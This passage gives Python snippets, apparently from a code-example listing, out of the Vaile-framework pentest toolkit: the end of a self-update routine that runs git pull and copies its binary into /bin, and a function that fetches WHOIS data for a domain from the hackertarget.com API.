                 if d != "":
                     path = os.path.dirname(os.path.realpath(__file__))
                     if "/home/" in path:
                         user = path.split("/")[2]
                         os.system("sudo -u {} git pull".format(user))
                     else:
                         os.system("git pull ; cp tmp/Vaile /bin/Vaile ; chmod +x /bin/Vaile")
                     print(G+" [+] Update installed successfully."+C+color.TR2+C)
         else:
             print(" [+] You are running the latest version of Vaile-framework ({}).".format(localver))
         if gui:
             return (uptodate, onver)
     except Exception:
         print(R + " [-] " + "\033[0m" + color.UNDERLINE + "\033[1m" + "An error occurred fetching...")
Example #30
def whoischeckup(web):
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    from core.methods.print import posintpas
    posintpas("whois lookup")
    time.sleep(0.4)
    print('' + GR + color.BOLD + ' [!] Looking Up for WhoIS Information...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result: \n" + color.END)
    domains = [web]
    for dom in domains:
        text = requests.get('http://api.hackertarget.com/whois/?q=' + dom).text
        nping = str(text)
        if 'error' not in nping:
            print(color.END + nping + C)
        else:
            print(R + ' [-] Outbound Query Exception!')
            time.sleep(0.8)